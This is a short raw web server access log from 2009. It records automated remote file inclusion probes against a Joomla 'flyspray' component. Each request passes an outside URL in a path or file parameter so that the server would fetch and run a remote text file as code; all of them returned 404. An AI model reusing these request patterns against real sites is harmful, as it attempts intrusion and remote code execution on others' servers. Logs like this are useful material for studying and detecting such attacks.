69.94.125.100 - - [24/Jun/2009:06:52:06 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.84.177.170 - - [24/Jun/2009:06:52:34 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:52:35 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:52:41 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
